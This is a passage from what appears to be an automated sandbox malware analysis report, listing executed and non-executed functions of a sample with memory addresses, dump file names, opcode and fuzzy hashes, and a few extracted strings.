                                                            • Snapshot File: hcaresult_0_2_7ff849340000_9XHFe6y4Dj.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: f3df945fd9846e661e6d2ae02284c13d5afe0a967ff2d61d5bd3ed8bdbe86ea2
                                                            • Instruction ID: 7665103ae8b6f5ce6fefa80f021b8891d5ddff9490dcfec018de341fed4508d9
                                                            • Opcode Fuzzy Hash: f3df945fd9846e661e6d2ae02284c13d5afe0a967ff2d61d5bd3ed8bdbe86ea2
                                                            • Instruction Fuzzy Hash: C0E0C230D2C84E9EEBA4FF948A425FDB6B1FF49380F51203AD00EE3185DA3824109A60
                                                            Function 00007FF848BF4D12 Relevance: .0, Instructions: 24COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2644593300.00007FF848BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848BF0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff848bf0000_9XHFe6y4Dj.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: d97390303b45af23fcb6b3c64e61768eb243c8cd8f72704ca8afcfe9075875cc
                                                            • Instruction ID: 120533bef50e7e1b85416cc430db006dadd897894a29b2d27c3eace674775126
                                                            • Opcode Fuzzy Hash: d97390303b45af23fcb6b3c64e61768eb243c8cd8f72704ca8afcfe9075875cc
                                                            • Instruction Fuzzy Hash: 74E09221D1C8165FF7AAFA2444095B867A2EF84744F054474C60DD36E7DF2D2D178689
                                                            Function 00007FF848BF12E8 Relevance: .0, Instructions: 14COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2644593300.00007FF848BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848BF0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff848bf0000_9XHFe6y4Dj.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 7b0807466e273422bcfb1cf230c82f027f4fc410fcf6cceac6ad6238913193f5
                                                            • Instruction ID: 63beee1d29a0fd9bf254b1c390f24ccfea6d09efca945ec8d08992d6034c3997
                                                            • Opcode Fuzzy Hash: 7b0807466e273422bcfb1cf230c82f027f4fc410fcf6cceac6ad6238913193f5
                                                            • Instruction Fuzzy Hash: ACC012305548088FCA48FB28C884D1473E0FB1A308B951094E00DCB2A1D72AECC2CB40
                                                            Function 00007FF848BF06A5 Relevance: .0, Instructions: 13COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2644593300.00007FF848BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848BF0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff848bf0000_9XHFe6y4Dj.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 2a6148f374e2f37aa2c6c4aba6007f5d4285cfd58a983087f2709718e8b78489
                                                            • Instruction ID: 43476939a0086503c4d71080ceaeee354023cf4d31f66387f9ba775d1877083f
                                                            • Opcode Fuzzy Hash: 2a6148f374e2f37aa2c6c4aba6007f5d4285cfd58a983087f2709718e8b78489
                                                            • Instruction Fuzzy Hash: 07C08C00D1EC0B1CF400B12E180A0BCB3405BD8290FD00032D78CC08E1EF0D20D7014E
                                                            Function 00007FF848FB04EB Relevance: .0, Instructions: 11COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2999115847.00007FF848FB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848FB0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff848fb0000_9XHFe6y4Dj.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 3142148b28960b5a8306f0608878ae2655bcfa85cd9d5152d599b110c2bd5448
                                                            • Instruction ID: ee8ff0e526ecdcf99b9217cc835dbc17562872651f2d6985aaf0f6650a7eae7d
                                                            • Opcode Fuzzy Hash: 3142148b28960b5a8306f0608878ae2655bcfa85cd9d5152d599b110c2bd5448
                                                            • Instruction Fuzzy Hash: ADD0C970A0C5578DF678F701402063E91905FB0380F60003ED85F818C1EF1DB8016A2D
                                                            Function 00007FF849347D6B Relevance: .0, Instructions: 11COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.3445459192.00007FF849340000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849340000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff849340000_9XHFe6y4Dj.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 88aee399057a8ae294d7c21b75ba5aea158a791c35857b1981143dab32966a3c
                                                            • Instruction ID: 6a02dfe25287f1f93150070342b0837cb369333c2c7ff9529e362a211316a063
                                                            • Opcode Fuzzy Hash: 88aee399057a8ae294d7c21b75ba5aea158a791c35857b1981143dab32966a3c
                                                            • Instruction Fuzzy Hash: 5BD0CA34A2CAC38DF2387E11846023A66A19F873C1E23607ED0AF419E1CE2CB8016A02
                                                            Function 00007FF8493400FB Relevance: .0, Instructions: 11COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.3445459192.00007FF849340000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849340000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff849340000_9XHFe6y4Dj.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 951965713b2cd879a167701f0867d5f49ced8fcf1762862e84dbb73c0ed3ac39
                                                            • Instruction ID: 3f71d85342f2dca4b495474f5842e7290a0013394db23201880b7c31250c1e63
                                                            • Opcode Fuzzy Hash: 951965713b2cd879a167701f0867d5f49ced8fcf1762862e84dbb73c0ed3ac39
                                                            • Instruction Fuzzy Hash: 67D09228B0D5CB8EF7786F01812123929905F0B780E66203DC4DF558C3CD29B9416A12
                                                            Function 00007FF848BF06C8 Relevance: .0, Instructions: 8COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2644593300.00007FF848BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848BF0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff848bf0000_9XHFe6y4Dj.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 53249ff88f5ad3fd8eff551dcc8ad3a66af1e7e9ca8758f19f8b85f492a9693b
                                                            • Instruction ID: 1d2fd19147c27badcd8d352b324acd5e11cfecc4799cae2e163df0d11bb31406
                                                            • Opcode Fuzzy Hash: 53249ff88f5ad3fd8eff551dcc8ad3a66af1e7e9ca8758f19f8b85f492a9693b
                                                            • Instruction Fuzzy Hash: 07B01200C6E80F0CE404317E094A07971805B48140FC01070EA4CC0481EA4D11A6024B
                                                            Function 00007FF848FB9291 Relevance: .0, Instructions: 4COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2999115847.00007FF848FB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848FB0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff848fb0000_9XHFe6y4Dj.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 925693c8c6ec420e5ebefc818045c7be3f4c5e02229417e4c5dfd2bdb27f492b
                                                            • Instruction ID: eedb5a0502108f7713463c6e3e2d6d9f78c8655c611bedb4ab73d4edbcdca263
                                                            • Opcode Fuzzy Hash: 925693c8c6ec420e5ebefc818045c7be3f4c5e02229417e4c5dfd2bdb27f492b
                                                            • Instruction Fuzzy Hash: 69A00220F1C8164EE452736400411BE00451FA46C0F208071D41E915C7DF1C6506114E

                                                            Non-executed Functions

                                                            Function 00007FF849344610 Relevance: 15.3, Strings: 12, Instructions: 332COMMON
                                                            Download Yara Rule
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.3445459192.00007FF849340000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849340000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff849340000_9XHFe6y4Dj.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: a=I$ b=I$0a=I$0b=I$@b=I$Pb=I$`b=I$pb=I$`=I$b=I$e=I$n=I
                                                            • API String ID: 0-2844311158
                                                            • Opcode ID: 706482d6e2de6cd167eb7a5f7e1a1ceb621a9db5fbe50d19d3a36f25bf887c00
                                                            • Instruction ID: ee1ff51516a5746f40eb5faf954bdb51a63f40912d7b650dff0b1cd14de08e33
                                                            • Opcode Fuzzy Hash: 706482d6e2de6cd167eb7a5f7e1a1ceb621a9db5fbe50d19d3a36f25bf887c00
                                                            • Instruction Fuzzy Hash: A5A1B367D0EAD24FE2666A6C2C290A56FF5FB53798B0A42FBC1544B1DFD4289C0983C1
                                                            Function 00007FF848BF09B0 Relevance: 5.2, Strings: 4, Instructions: 183COMMON
                                                            Download Yara Rule
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2644593300.00007FF848BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848BF0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff848bf0000_9XHFe6y4Dj.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: c9$!k9$"s9$#{9
                                                            • API String ID: 0-1692736845
                                                            • Opcode ID: 202621eb0d3a648566cf3d8c374ee5b9226916743052ea5672af5e191d331ad4
                                                            • Instruction ID: f5920e392d5535cdcb720d117f27b1385873d6994b8bd3f0173ea68618b65dc6
                                                            • Opcode Fuzzy Hash: 202621eb0d3a648566cf3d8c374ee5b9226916743052ea5672af5e191d331ad4
                                                            • Instruction Fuzzy Hash: 2E415347A0F86669E9113ABD74911FD6B64FF413B6F184377E24C890D38F28609282FD

                                                            Executed Functions

                                                            Function 00007FF848BD0D98 Relevance: .2, Instructions: 245COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000048.00000002.2760415009.00007FF848BD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848BD0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_72_2_7ff848bd0000_9XHFe6y4Dj.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: b2183798caa35b7af8e17face1a6fef5b355b20710aedaa0921e97833cf792a1
                                                            • Instruction ID: 9a355aee9de02be2d0fdb649ed85924279b17a94b8e880e9308ae52b00a5d723
                                                            • Opcode Fuzzy Hash: b2183798caa35b7af8e17face1a6fef5b355b20710aedaa0921e97833cf792a1
                                                            • Instruction Fuzzy Hash: B681CF71D28A8A9FE788EB2888593AABFE1FB99350F10007AC009C77D2CF7518558B10
                                                            Function 00007FF848BD08D0 Relevance: .2, Instructions: 158COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000048.00000002.2760415009.00007FF848BD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848BD0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_72_2_7ff848bd0000_9XHFe6y4Dj.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: c81bd47b5c9be4e6dd8ab75612c073fe7fe40446397f622e9a3bf78555da6b94
                                                            • Instruction ID: 644f4ac2db7315c769f144fae5c97b7a349e38e004695de19ff0d3046aef8dcb
                                                            • Opcode Fuzzy Hash: c81bd47b5c9be4e6dd8ab75612c073fe7fe40446397f622e9a3bf78555da6b94
                                                            • Instruction Fuzzy Hash: FF415922A0D9552EE704BB7C60D62F9B7D0FF893A5F1400BED14DCB1D3DE2868918788
                                                            Function 00007FF848BD0960 Relevance: .1, Instructions: 115COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000048.00000002.2760415009.00007FF848BD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848BD0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_72_2_7ff848bd0000_9XHFe6y4Dj.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: d1290e2a6acc91aa30c73f8c5fd11166466b6bccce10ef66079c9d2907dfdc50
                                                            • Instruction ID: 19a99af41792a1898b1e1de6814866b4a876047b20b9ad2220083d5dc56627ff
                                                            • Opcode Fuzzy Hash: d1290e2a6acc91aa30c73f8c5fd11166466b6bccce10ef66079c9d2907dfdc50
                                                            • Instruction Fuzzy Hash: E3313822A1DD592FE744B77C648A6F9B3C1EF883A1F5400BAE40DC31D3CE28AC814698
                                                            Function 00007FF848BD0998 Relevance: .1, Instructions: 112COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000048.00000002.2760415009.00007FF848BD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848BD0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_72_2_7ff848bd0000_9XHFe6y4Dj.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 4b81a2e262aa1a103d392c45f665be8cf2e0b0cfd6b59091c62012d3d1fcf823
                                                            • Instruction ID: 777210c2137dbb101eee8c54a824c786f05405f5d9c34c0c6ecc17b47689ff93
                                                            • Opcode Fuzzy Hash: 4b81a2e262aa1a103d392c45f665be8cf2e0b0cfd6b59091c62012d3d1fcf823
                                                            • Instruction Fuzzy Hash: 9731C720B1D9492FE788F72C944A6B9B7C1EF9C351F5001B9E40DC32D7DE28AC818785
                                                            Function 00007FF848BD11AB Relevance: .1, Instructions: 90COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000048.00000002.2760415009.00007FF848BD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848BD0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_72_2_7ff848bd0000_9XHFe6y4Dj.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: aaa7c0b10e9a96ea00ed986ded0499cb38678ad4e55dd943bd4854551d80c3d9
                                                            • Instruction ID: c402f3c5e7d298f2adea24fd31aa5659399dda6203cc83c99465dc7c7bf494d1
                                                            • Opcode Fuzzy Hash: aaa7c0b10e9a96ea00ed986ded0499cb38678ad4e55dd943bd4854551d80c3d9
                                                            • Instruction Fuzzy Hash: C6314F3090D68A9FDB85FB64C8559A9BBF0EF1A340F0545BAC04AD76A3DB28A845CB50
                                                            Function 00007FF848BD5E63 Relevance: .1, Instructions: 87COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000048.00000002.2760415009.00007FF848BD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848BD0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_72_2_7ff848bd0000_9XHFe6y4Dj.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 8122c37c87ad55910f314066f6ffe0d3940005cac555d9d83a1f5315f0cf9705
                                                            • Instruction ID: 26812a3bf7edb2ba968c0023e8ccc41de7fbebe4bb55f731a6a71d088b8d2cce
                                                            • Opcode Fuzzy Hash: 8122c37c87ad55910f314066f6ffe0d3940005cac555d9d83a1f5315f0cf9705
                                                            • Instruction Fuzzy Hash: D9218330E1C80A5FEB94FA2894557BC72D1FF98380F4441B5D41ED7692EF286C428F48
                                                            Function 00007FF848BD0C25 Relevance: .1, Instructions: 86COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000048.00000002.2760415009.00007FF848BD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848BD0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_72_2_7ff848bd0000_9XHFe6y4Dj.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 3fe148665da45798823cc06749e9e4f5fa70335c293ccb0569900038555d93f8
                                                            • Instruction ID: 6a3ab16e94632a626d59d7ab3e8b2ff47a05fe9d796e675ef2074cb67197cf60
                                                            • Opcode Fuzzy Hash: 3fe148665da45798823cc06749e9e4f5fa70335c293ccb0569900038555d93f8
                                                            • Instruction Fuzzy Hash: 7C21DB7690DA56AEE701BB68B4452EC7BB0FF81351F1845B6C0088B5C3CB3C248BCB59
                                                            Function 00007FF848BD1B3B Relevance: .1, Instructions: 57COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000048.00000002.2760415009.00007FF848BD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848BD0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_72_2_7ff848bd0000_9XHFe6y4Dj.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 573749cd73ecb1327921184670ff04e5e8dbec6b398af69f6e22a78a6ea19a10
                                                            • Instruction ID: 9f269bccccf6e709703e7f3a9ac378dcb49c22abcc334acfdf6e632ad0cd418a
                                                            • Opcode Fuzzy Hash: 573749cd73ecb1327921184670ff04e5e8dbec6b398af69f6e22a78a6ea19a10
                                                            • Instruction Fuzzy Hash: 5901E131F1CD0AAFEB94FB28905967C66D1EF94341F0540B5D40ECB6E2DE28AC428B48
                                                            Function 00007FF848BD4D66 Relevance: .0, Instructions: 49COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000048.00000002.2760415009.00007FF848BD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848BD0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_72_2_7ff848bd0000_9XHFe6y4Dj.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 4181046b032fdc4e55cb6dca380cfc04e47174f9494b51dd39846e4381dae444
                                                            • Instruction ID: 103768825935f3b1fb50d4101379bc956b491fdbced55df0a149f26b3e5a292d
                                                            • Opcode Fuzzy Hash: 4181046b032fdc4e55cb6dca380cfc04e47174f9494b51dd39846e4381dae444
                                                            • Instruction Fuzzy Hash: 6E117C70A0C11A8FFB58AA04C850BE8B3E1DB45314F1440B9D41E976D2CE29AE868B48
                                                            Function 00007FF848BD22AD Relevance: .0, Instructions: 47COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000048.00000002.2760415009.00007FF848BD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848BD0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_72_2_7ff848bd0000_9XHFe6y4Dj.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 0d74c61bd032d10f5306e2b61c68ca559ebe52a39bbae79dd63f4214c83bb294
                                                            • Instruction ID: c5ca0907e002762e823ff8ea1b74e2bbd12b178116b506f4b24f71d14aa8595e
                                                            • Opcode Fuzzy Hash: 0d74c61bd032d10f5306e2b61c68ca559ebe52a39bbae79dd63f4214c83bb294
                                                            • Instruction Fuzzy Hash: F0112D31A489198FDB54EB08C895BAEB7E1FF98340F5145A9D00EE72A1CF35BA408F85
                                                            Function 00007FF848BD5F87 Relevance: .0, Instructions: 39COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000048.00000002.2760415009.00007FF848BD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848BD0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_72_2_7ff848bd0000_9XHFe6y4Dj.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: ce749b0e960016d5c2acbca1af00a585ae9a578d308ddd4ffd1434afba4a8635
                                                            • Instruction ID: 325f919dbdb8a8c4ae9468161b297d8b89a5ea476b95308e0464eb02fd628163
                                                            • Opcode Fuzzy Hash: ce749b0e960016d5c2acbca1af00a585ae9a578d308ddd4ffd1434afba4a8635
                                                            • Instruction Fuzzy Hash: 8C013130D1C81A9FEB64FA14DC866F873E1FB94351F1041B9C45ED3A92DF3869868E49
                                                            Function 00007FF848BD5F3E Relevance: .0, Instructions: 34COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000048.00000002.2760415009.00007FF848BD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848BD0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_72_2_7ff848bd0000_9XHFe6y4Dj.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: db8bf9ec5e88451419c03bf25d02a19787be88e2a439475d36952a615a5470ac
                                                            • Instruction ID: e5c2ef099870320934984292cc68f0ce44319b0d596c3ff06c3d13d0099c91a4
                                                            • Opcode Fuzzy Hash: db8bf9ec5e88451419c03bf25d02a19787be88e2a439475d36952a615a5470ac
                                                            • Instruction Fuzzy Hash: 86F0363091C4069FEA54F618E8856B833D1EB54391F5041B5D85ED3A92DE287C468E49
                                                            Function 00007FF848BD0C6B Relevance: .0, Instructions: 27COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000048.00000002.2760415009.00007FF848BD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848BD0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_72_2_7ff848bd0000_9XHFe6y4Dj.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 6af9a20e7035a2e0b78c941f1af63df54d569afa83d1eda32ba2843bc91e9f35
                                                            • Instruction ID: e43ab268637e40c6515de8178c17524cb83bab9f9b7bd7a8dc94ad136d23257e
                                                            • Opcode Fuzzy Hash: 6af9a20e7035a2e0b78c941f1af63df54d569afa83d1eda32ba2843bc91e9f35
                                                            • Instruction Fuzzy Hash: FCF03A34D08649EFEB10FF68D48459DBBF0EB44301F2445A5D404D7244EA3496898B80
                                                            Function 00007FF848BD0B87 Relevance: .0, Instructions: 26COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000048.00000002.2760415009.00007FF848BD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848BD0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_72_2_7ff848bd0000_9XHFe6y4Dj.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: d00ca56bc1c55a3a75325f72c861d6c3710a9e726c70a9bf87d01427aad848a9
                                                            • Instruction ID: 600b7c2360ec26efc9a60e42871e871eef8773ab356ebcdd2951d44124be7ae2
                                                            • Opcode Fuzzy Hash: d00ca56bc1c55a3a75325f72c861d6c3710a9e726c70a9bf87d01427aad848a9
                                                            • Instruction Fuzzy Hash: 79E086256598498FCA09BB3998A59D5BBA0FB47214B8F00EAD04CCB5A2E315585DCB41
                                                            Function 00007FF848BD12E8 Relevance: .0, Instructions: 14COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000048.00000002.2760415009.00007FF848BD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848BD0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_72_2_7ff848bd0000_9XHFe6y4Dj.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 7b0807466e273422bcfb1cf230c82f027f4fc410fcf6cceac6ad6238913193f5
                                                            • Instruction ID: 78dec3c447d73c6335b3848b1dcac6a4a660cbbb4ca2ecd8093dd0128add31cf
                                                            • Opcode Fuzzy Hash: 7b0807466e273422bcfb1cf230c82f027f4fc410fcf6cceac6ad6238913193f5
                                                            • Instruction Fuzzy Hash: C9C012345548088FCA48FB28C884D1473E1FB5A314B951094E00DCB2A1D62AECC2CB40
                                                            Function 00007FF848BD06A5 Relevance: .0, Instructions: 13COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000048.00000002.2760415009.00007FF848BD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848BD0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_72_2_7ff848bd0000_9XHFe6y4Dj.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 2a6148f374e2f37aa2c6c4aba6007f5d4285cfd58a983087f2709718e8b78489
                                                            • Instruction ID: d7b236735e1496bdb8cc700cb991f9153b12600876df8e76e98c4cac7052a272
                                                            • Opcode Fuzzy Hash: 2a6148f374e2f37aa2c6c4aba6007f5d4285cfd58a983087f2709718e8b78489
                                                            • Instruction Fuzzy Hash: 78C08C04D1EC0B2CF400B12E340A0ACA5C09BD4390FD00032C40C408C1DE0D20D7094E
                                                            Function 00007FF848BD0708 Relevance: .0, Instructions: 12COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000048.00000002.2760415009.00007FF848BD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848BD0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_72_2_7ff848bd0000_9XHFe6y4Dj.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 8330e0558b660b4b0056c2e9ffd26dfad95a3688740041a8927d16767c759552
                                                            • Instruction ID: f725eba5b14559293413774e4ea040dfbe0bc263a46c7855a77b4db1593fe68e
                                                            • Opcode Fuzzy Hash: 8330e0558b660b4b0056c2e9ffd26dfad95a3688740041a8927d16767c759552
                                                            • Instruction Fuzzy Hash: BDC04C3052580D9FC994F729C98595476E0FB09305BD510D4E409C7561E65A98549B45
                                                            Function 00007FF848BD4D37 Relevance: .0, Instructions: 10COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000048.00000002.2760415009.00007FF848BD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848BD0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_72_2_7ff848bd0000_9XHFe6y4Dj.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: a82269b2b45ec26b4afb8cc1f0546e99d33cab433ae607e6021a37dbc0fef75d
                                                            • Instruction ID: e3c3ec436b1ba6f841458d775d5419f1be0811fbad59c383a950a7bef6ac96d0
                                                            • Opcode Fuzzy Hash: a82269b2b45ec26b4afb8cc1f0546e99d33cab433ae607e6021a37dbc0fef75d
                                                            • Instruction Fuzzy Hash: FFC04C41F198163AE769661451116BE48829F84644F515434E60EC67CBCF2D5A0306CE
                                                            Function 00007FF848BD06C8 Relevance: .0, Instructions: 8COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000048.00000002.2760415009.00007FF848BD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848BD0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_72_2_7ff848bd0000_9XHFe6y4Dj.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 53249ff88f5ad3fd8eff551dcc8ad3a66af1e7e9ca8758f19f8b85f492a9693b
                                                            • Instruction ID: bfba3a93cd7e98adbc316960a27c19a0f556966ad06f96f6bbb872edf3ba82f1
                                                            • Opcode Fuzzy Hash: 53249ff88f5ad3fd8eff551dcc8ad3a66af1e7e9ca8758f19f8b85f492a9693b
                                                            • Instruction Fuzzy Hash: 61B00204C6E84F1DE454317E195E06974D09B45354FD51174D80D50585D94D15A6165B

                                                            Non-executed Functions

                                                            Function 00007FF848BD09B0 Relevance: 5.2, Strings: 4, Instructions: 183COMMON
                                                            Download Yara Rule
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000048.00000002.2760415009.00007FF848BD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848BD0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_72_2_7ff848bd0000_9XHFe6y4Dj.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: c9$!k9$"s9$#{9
                                                            • API String ID: 0-1692736845
                                                            • Opcode ID: a427425443aeaccbc86057b6a28c5b424428d03c9f8aa2719d40ddf133f91979
